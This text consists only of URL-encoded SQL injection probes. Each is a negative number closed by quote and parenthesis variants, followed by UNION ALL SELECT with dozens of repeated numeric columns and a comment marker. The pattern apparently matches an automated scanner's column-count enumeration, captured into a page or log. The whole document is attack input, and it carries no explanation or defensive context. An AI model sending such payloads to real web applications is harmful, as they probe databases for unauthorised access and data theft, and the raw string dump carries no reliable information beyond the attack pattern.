-4492%27%29%20UNION%20ALL%20SELECT%202850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%2C2850%23 -9307%27%29%20UNION%20ALL%20SELECT%207209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%2C7209%23 -8130%27%29%20UNION%20ALL%20SELECT%201209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%2C1209%23 -6434%27%29%20UNION%20ALL%20SELECT%203683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%23 -4581%27%29%20UNION%20ALL%20SELECT%203890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%2C3890%23 -1575%27%29%20UNION%20ALL%20SELECT%209869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%2C9869%23 -1545%27%29%20UNION%20ALL%20SELECT%207395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%2C7395%23 -9630%27%29%20UNION%20ALL%20SELECT%205604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%2C5604%23 -9173%27%29%20UNION%20ALL%20SELECT%205170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%2C5170%23 -6853%27%20UNION%20ALL%20SELECT%203839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%2C3839%23 -9313%27%20UNION%20ALL%20SELECT%207998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%2C7998%23 -1959%27%20UNION%20ALL%20SELECT%207801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%23 -9572%27%20UNION%20ALL%20SELECT%204003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%2C4003%23 -6078%27%20UNION%20ALL%20SELECT%205497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%23 -8424%27%20UNION%20ALL%20SELECT%204350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%23 -8619%27%20UNION%20ALL%20SELECT%208650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%2C8650%23 -2566%27%20UNION%20ALL%20SELECT%203190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%23 -8133%27%20UNION%20ALL%20SELECT%202970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%23 -1271%27%20UNION%20ALL%20SELECT%205718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%2C5718%23 -9141%22%20UNION%20ALL%20SELECT%207213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%2C7213%23 -4482%22%20UNION%20ALL%20SELECT%202149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%2C2149%23 -4777%22%20UNION%20ALL%20SELECT%202671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%2C2671%23 -1612%22%20UNION%20ALL%20SELECT%207170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%2C7170%23 -8483%22%20UNION%20ALL%20SELECT%204958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%2C4958%23 -2411%22%20UNION%20ALL%20SELECT%201058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%2C1058%23 -1017%22%20UNION%20ALL%20SELECT%203047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%2C3047%23 -9410%22%20UNION%20ALL%20SELECT%207186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%23 -9090%22%20UNION%20ALL%20SELECT%204608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%2C4608%23 -5747%22%20UNION%20ALL%20SELECT%204960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%23 -4246%27%29%20UNION%20ALL%20SELECT%203936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%2C3936%23 -1890%27%29%20UNION%20ALL%20SELECT%208944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%2C8944%23 -7332%27%29%20UNION%20ALL%20SELECT%203135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%2C3135%23 -7236%27%29%20UNION%20ALL%20SELECT%208448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%2C8448%23 -8954%27%29%20UNION%20ALL%20SELECT%206092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%2C6092%23 -7144%27%29%20UNION%20ALL%20SELECT%205441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%2C5441%23 -2057%27%29%20UNION%20ALL%20SELECT%205676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%2C5676%23 -5495%27%29%20UNION%20ALL%20SELECT%201555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%23 -3636%27%29%20UNION%20ALL%20SELECT%207764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%2C7764%23 -1004%27%29%20UNION%20ALL%20SELECT%202495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%23 -5722%27%29%29%20UNION%20ALL%20SELECT%203179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%23 -8032%27%29%29%20UNION%20ALL%20SELECT%208738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%2C8738%23 -1676%27%29%29%20UNION%20ALL%20SELECT%205389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%2C5389%23 -6087%27%29%29%20UNION%20ALL%20SELECT%204040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%2C4040%23 -4667%27%29%29%20UNION%20ALL%20SELECT%208313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%2C8313%23 -7489%27%29%29%20UNION%20ALL%20SELECT%208560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%2C8560%23 -3320%27%29%29%20UNION%20ALL%20SELECT%209792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%2C9792%23 -4995%27%29%29%20UNION%20ALL%20SELECT%207690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%2C7690%23 -9626%27%29%29%20UNION%20ALL%20SELECT%204438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%2C4438%23 -3023%27%29%29%20UNION%20ALL%20SELECT%203920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%2C3920%23 -8412%27%29%29%29%20UNION%20ALL%20SELECT%209306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%2C9306%23 -8275%27%29%29%29%20UNION%20ALL%20SELECT%201590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%2C1590%23 -8351%27%29%29%29%20UNION%20ALL%20SELECT%201980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%2C1980%23 -6001%27%29%29%29%20UNION%20ALL%20SELECT%205842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%2C5842%23 -5110%27%29%29%29%20UNION%20ALL%20SELECT%202557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%2C2557%23 -2099%27%29%29%29%20UNION%20ALL%20SELECT%207302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%2C7302%23 -3152%27%29%29%29%20UNION%20ALL%20SELECT%208479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%2C8479%23 -6460%27%29%29%29%20UNION%20ALL%20SELECT%207344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%2C7344%23 -5839%27%29%29%29%20UNION%20ALL%20SELECT%203511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%23 -6649%27%29%29%29%20UNION%20ALL%20SELECT%208526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%2C8526%23 